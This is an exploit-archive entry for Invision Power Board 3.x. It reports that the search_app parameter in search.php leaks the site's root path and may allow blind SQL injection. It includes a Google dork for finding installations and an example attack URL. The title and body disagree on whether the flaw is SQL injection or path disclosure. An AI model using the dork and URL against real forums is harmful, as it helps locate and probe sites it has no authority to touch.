Invision Power Board 3 - 'search_app' SQL Injection
Author: Lord Tittis3000
type: webapps
platform: php
port:
date_added: 2010-11-13
date_updated: 2017-11-13
verified: 0
codes:
tags:
aliases:
screenshot_url:
application_url:
# ============================================================
# Exploit Title: Invision Power Board 3 Multiple Vuln
# Date: 13/11/2010# Author: LordTittiS
# Greetings To: God_Of_Pain, System_Overide
# Software Link: http://www.invisionpower.com/
# Vulnerability Type: Full Path Disclosure# Version: 3.x.x (All 3 Version)
# ===========================================================
-Vulnerability Details:
The vulnerability is in the file search.php, the variable search_app is vulnerable.An attacker can exploit this to find out the rootpath of website or for Blind SQLi attack.
-Google Dork: inurl:index.php?app=core
-Example:http://server/index.php?app=core&module=search§ion=search&do=quick_search&search_app[]=